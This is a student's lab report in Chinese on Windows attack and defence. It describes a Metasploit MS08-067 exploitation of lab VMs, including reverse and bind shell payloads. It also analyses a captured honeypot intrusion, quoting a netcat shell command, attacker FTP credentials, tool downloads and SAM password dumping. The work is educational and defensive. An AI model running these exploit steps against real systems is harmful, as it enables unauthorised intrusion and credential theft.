20252916 2025-2026-2 《网络攻防实践》第6周作业
20252916 2025-2026-2 《网络攻防实践》第6周作业
1.知识点梳理与总结
1.1 实验任务
-
动手实践Metasploit windows attacker
使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
-
取证分析实践
还原来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。回答以下问题:
- 攻击者使用了什么破解工具进行攻击
- 攻击者如何使用这个破解工具进入并控制了系统
- 攻击者获得系统访问权限后做了什么、我们如何防止这样的攻击
- 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
-
团队对抗实践:
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
1.2 实验环境
| 虚拟机名称 | 操作系统 | IP 地址 | 实验角色 |
|---|---|---|---|
| Kali2025.4 | Kali Linux | 192.168.200.9 | 攻击机、流量分析节点 |
| Win2kserver | Windows 2000 | 192.168.200.140 | 渗透靶机、防守方流量监听节点 |
| Kali2021.1 | Kali Linux | 192.168.200.4 | 备用攻击机、辅助分析节点 |
2.实验过程
2.1动手实践Metasploit windows attacker
-
查看kali2025.4的ip是
192.168.200.9以及靶机的ip是192.168.200.140

-
在kali中启动 Metasploit并且在完成初始化后进入msfconsole控制台
msfconsole
-
命令行输入
search ms08_067查看漏洞ms08_067详细信息
-
输入
use windows/smb/ms08_067_netapi进入漏洞所在文件
-
输入
show options查看攻击此漏洞需要的设置
-
命令行输入
show payloads查看有效的攻击载荷,选择第4个载荷 payload generic/shell_reverse_tcp 进行攻击
-
命令行输入
set payload windows/shell_bind_tcp换成最原始、最轻量级的正向 Shell 载荷!,输入set RHOST 192.168.200.140设置渗透攻击的靶机IP,输入set LHOST 192.168.200.9设置渗透攻击的主机是kali2025.4
-
输入
exploit进行渗透攻击
-
回车即可进入到受害靶机的shell,输入命令
ipconfig/all查看的IP地址为192.168.200.140,则成功入侵windows靶机。
2.2 取证分析实践
再学习通上下载snort-0204@0117.log文件,用wireshark打开,可以看见许多报文。使用ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http过滤数据包


跟踪一个报文的tcp数据流,找到%C0%AF,经视频提醒以及百度查询资料可以知道,在初步探测阶段,攻击者巧妙利用了 IIS 4.0 对 Unicode 编码解析的盲区,实现跨目录跳跃,直接触及并读取了系统底层的 boot.ini 文件。这不仅暴露了目标 Windows NT 的核心硬件与系统信息,也让攻击者确信该高危漏洞可以被深度利用,为后续攻击奠定了基础。
完成漏洞探测后,攻击者针对靶机 IIS 服务的 MDAC RDS 漏洞发起攻击,通过两步完成恶意代码植入:

发现大量针对 msadcs.dll 的 HTTP 请求,该文件为 IIS RDS 服务的核心组件,也是本次攻击的核心利用目标。
之后跟踪 TCP 数据流

根据分析表明,攻击者向目标 IIS 服务器的 /msadc/msadcs.dll/AdvancedDataFactory.Query 接口发送了构造恶意的 POST 请求。经提取载荷发现,流量中明文包含特征签名 !ADM!ROX!YOUR!WORLD!。结合漏洞指纹特征可推断,攻击者直接调用了知名黑客 rain forest puppy 发布的 msadc(2).pl 漏洞利用脚本。该行为精准命中了 Windows MDAC RDS 组件漏洞,通过 SQL 注入的手段达成了远程命令执行(RCE),成功为后续的恶意荷载植入和系统提权提供了突破口。
通过 RDS 漏洞获得远程代码执行权限后,攻击者开展了反向 Shell 配置与恶意工具下载操作,完成对靶机的持久化控制。
对 tcp.stream eq 109 的数据流进行筛选。


从跟踪的数据流的结果中可发现,攻击者通过恶意请求植入了 nc -l -p 6969 -e cmd1.exe 命令,该命令通过 netcat 工具在靶机的 6969 端口开启监听,绑定系统 cmd 命令行程序,实现反向 Shell 功能,为攻击者提供了靶机的交互式命令行控制权限。
之后攻击者通过FTP协议从服务器下载恶意工具

从这个数据流中可以看出攻击者连接远程服务器,使用账号johna2k和密码haxedj00完成登录,成功下载了nc.exe、pdump.exe以及samdump.dll三个文件,从而为后续的权限提升等操作提供了工具支撑。直到1106数据包才完成这个事情

攻击者获得靶机完整控制权后,开展了一系列系统操作,同时识别出了靶机的蜜罐属性。对 tcp.stream eq 178 的 TCP 数据流进行跟踪分析。

由这个数据流分析以及视频提醒可知:首先,攻击者下发了一系列 net 族命令(如 net users、net localgroup),对系统的账户与会话资产进行枚举,试图勘测提权路径。随后,攻击行为直指系统核心凭证,其借助预先上传的 pdump.exe 和 samdump.dll 窃取了 SAM 数据库中的密码密文,并执行 rdisk -/s 将口令文件备份为 c:\har.txt,完成了实质性的窃密。在达成目的后,攻击者立刻执行 del 命令销毁作案工具以擦除入侵痕迹。值得注意的是,攻击者在遍历文件系统后,通过向靶机根目录写入文本(内容为 "best honeypot i've seen till now 😃"),留下了明确的嘲讽标记,这成为攻击者已彻底识破目标蜜罐身份的铁证。
问题回答:
- 攻击者使用了什么破解工具?
分析结论: 通过对数据包的指纹特征提取,确认攻击者使用的是由黑客 rain forest puppy 编写的自动化渗透脚本 msadc(2).pl。该工具的核心原理是利用 Windows IIS 系统的 MDAC RDS 漏洞,通过构造恶意请求来实现代码执行。
- 攻击者是如何进入并控制系统的?
分析结论: 攻击者采取了“先探测、后利用”的两阶段策略:
- 第一阶段(信息收集与探测): 攻击者首先利用了 IIS 4.0 经典的 Unicode 目录遍历漏洞(将斜杠编码为
%C0%AF),越权读取了系统的底层启动文件boot.ini。这一步不仅探明了靶机为 Windows NT 架构,更确认了目标存在未修补的高危漏洞。 - 第二阶段(漏洞利用与控制): 确认目标脆弱性后,攻击者利用
msadc(2).pl触发 RDS 漏洞,通过 SQL 注入强行执行系统命令。随后,借助 FTP 协议将后门工具(如nc.exe、samdump.dll)下载至靶机,并最终利用 Netcat (nc -l -p 6969 -e cmd1.exe) 在目标主机上建立并监听了 6969 端口,成功获取了靶机的交互式反向 Shell,完成系统接管。
- 攻击者获得系统访问权限后做了什么?
分析结论: 攻击者获取 Shell 后,进行了一系列典型的“后渗透”操作:
- 内网信息探测: 频繁使用
net session、net users等系统自带命令,搜集本地账户与用户组信息,意图寻找提权路径。 - 敏感凭证窃取: 利用事先上传的
pdump.exe工具及rdisk -/s命令,成功导出并备份了 Windows 注册表中的 SAM 数据库(口令散列值文件),将其保存为c:\har.txt以备离线破解。 - 反取证操作(清理痕迹): 在核心目的达成后,调用
del命令删除了所上传的木马与提权工具,企图隐蔽攻击行踪。 - 恶意嘲讽标记: 在识别出靶机为蜜罐后,执行
echo命令向系统写入rfp.txt文本,内容为对其蜜罐身份的嘲讽。
- 我们如何防止这样的攻击?
分析结论: 针对此类典型的 Web 渗透链路,建议构建纵深防御体系:
- 收敛攻击面与补丁管理: 及时更新操作系统及 IIS 服务的安全补丁,彻底修复 Unicode 解析及 RDS 等已知漏洞;同时关闭非业务必须的 FTP、SMB 服务,剥离 IIS 多余扩展。
- 执行权限最小化: 严格降级 Web 服务的运行账号权限,剥夺其执行系统核心命令(如 cmd.exe)和访问 SAM 敏感文件的能力。
- 部署主动防御设备: 在网络边界与核心交换区部署 WAF(Web应用防火墙)与 IPS(入侵防御系统),针对含有
%C0%AF等恶意特征的 HTTP 请求以及非正常端口的外联回拨行为(如反弹 Shell)进行实时阻断与告警。
5. 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
分析结论: 攻击者已经察觉到这是一台蜜罐。
- 铁证: 在抓包截获的 TCP 流(Stream 178)中,清晰记录了攻击者主动向系统写入了带有嘲讽意味的字符文本
best honeypot i've seen till now :)。 - 逻辑推理: 作为一名经验丰富的攻击者,在渗透过程中极易察觉环境的异常。首先,该靶机故意保留了存在多年的陈旧高危漏洞(未打补丁),这在真实生产环境中极不合理;其次,靶机系统内充斥着各类黑客脚本与测试工具,违背了正常业务服务器的文件特征;最后,面对如此明目张胆的工具下载与系统提权行为,靶机不仅毫无安全响应机制,反而“畅通无阻”,这种极度脆弱的假象最终暴露了其蜜罐的本质。
**2.3 **团队对抗实践
-
这个实验由我和郭豪同学的电脑进行演示团队对抗实验,首先将我们的电脑连在同一个局域网内。然后编辑我们的kali以及win2kServer,设置成桥接模式,勾选上复制物理地址连接状态。

-
把win2kServer的网络连接改为自动获取IP地址。

-
修改完成后,两人电脑的配置如下:
- 20252916许超
- kali2025.4:
192.168.1.107 - win2kServer:
192.168.1.111
- kali2025.4:
- 20252913郭豪
- kali:
192.168.1.108 - win2kServer:
192.168.1.110
- kali:
- 20252916许超
-
首先我用kali攻击机去攻击郭豪的win2kServer靶机,首先测试连通性,由下图可以看出我的kali虚拟机可以联通郭豪的两台机器。

-
在Kali虚拟机中输入
msfconsole,启动Metasploit框架控制台
-
输入指令
use exploit/windows/smb/ms08_067_netapi加载MS08-067漏洞的核心利用模块。
-
输入指令
show payloads列出该漏洞可兼容的攻击载荷
-
输入指令
set payload generic/shell_reverse_tcp设置反向TCP Shell载荷,输入指令set LHOST 192.168.1.107设置Kali攻击机的IPset RHOST 192.168.1.110设置Win2kServer被攻击机的IP。
-
输入指令
show options查看设置的信息
-
输入指令
exploit进行攻击,攻击后可以发现已经进入了郭豪的靶机的命令行
-
输入指令
mkdir xuchao在对方主机中创建文件夹输入指令
cd xuchao进入该文件夹输入指令
echo I am xuchao 20252916 xuchao>>Test.txt在对方主机中创建一个Test.txt文件并留言如上
-
在对方电脑的C/WINNT/system32中出现了一个xuchao文件夹内,文件夹内有一个Test.txt记事本文件,内容为
I am xuchao 20252916 xuchao
-
测试防御
在对方进行攻击我的win2kServer靶机时,我打开wireshark软件进行监听,输入
ip.addr == 192.168.1.111 and ip.addr == 192.168.1.108追踪TCP数据流,可以追踪到攻击方输入的攻击指令。可以看见他先在我的电脑里创建了一个guohao的文件夹,然后进入这个文件夹,创建了一个test.txt文本文件,写入了内容为guohao20252913
-
由此,整个团队攻防实践流程结束。
3.学习中遇到的问题及解决
问题:在做实验一的时候,对 Windows 2000 靶机进行 MS08-067 漏洞渗透时,多次遭遇“Exploit completed, but no session was created”的错误提示。在确认网络连通性正常、且靶机未拦截 445 端口的情况下,依然无法建立任何会话?

原因分析:
- 内存地址偏移与服务崩溃: 靶机为非常古老的 Windows 2000 繁体中文版。由于 MS08-067 是基于内存缓冲区的溢出漏洞,对操作系统的语言和版本极度敏感。Metasploit 默认的“自动目标识别 (Automatic Targeting)”出现偏差,导致溢出后未能成功执行代码,反而直接导致了靶机的 Server 服务(svchost.exe)崩溃假死。
- 高级载荷的 API 缺失:靶机版本为最原始的 Service Pack 0 (SP0)。根据视频配置的攻击载荷
windows/meterpreter/...属于高度现代化的复杂木马。由于 SP0 系统的底层环境过于老旧,缺失运行 Meterpreter 所需的某些现代系统 API 支持,导致木马即使注入成功也会瞬间“死亡”,无法建立连接通道。
解决办法:
-
恢复环境: 首先重启 Windows 2000 靶机,恢复其已崩溃的 SMB 服务。
-
载荷降级: 放弃功能复杂的高级 Meterpreter,更换为最原始、兼容性最强的基础正向命令行载荷(
set payload windows/shell_bind_tcp)。 -
精准打击:利用
set TARGET 1手动锁定通用攻击坐标。# 1. 加载作业要求的漏洞模块 use exploit/windows/smb/ms08_067_netapi # 2. 【核心修改】抛弃 meterpreter,换成最原始、最轻量级的正向 Shell 载荷! set payload windows/shell_bind_tcp # 3. 设置靶机 IP set RHOST 192.168.200.140 # 4. 手动锁定 Windows 2000 通用目标 set TARGET 1 # 5. 发射! exploit再次执行
exploit命令后,成功规避了环境不兼容问题,顺利获取了靶机的C:\WINNT\system32>基础系统命令行,完成了实验。
4.学习感悟、思考等
回顾本次 Windows 系统安全攻防实验,我最大的收获在于“安全思维”的全面重塑。过去我往往将漏洞视为孤立的系统缺陷,而通过 Metasploit 对目标靶机的攻击,我了解了漏洞如何被转化为系统控制权的。取证分析环节则让我了解了了在真实攻击中,攻击者是如何利用作案工具与渗透路径慢慢入侵系统,从而拿到系统的控制权。这次实验极大的强化了我的实操技能,同时在实验任务1的排查错误过程中,也锻炼了我的利用网络查找资料解决实际问题的能力。

浙公网安备 33010602011771号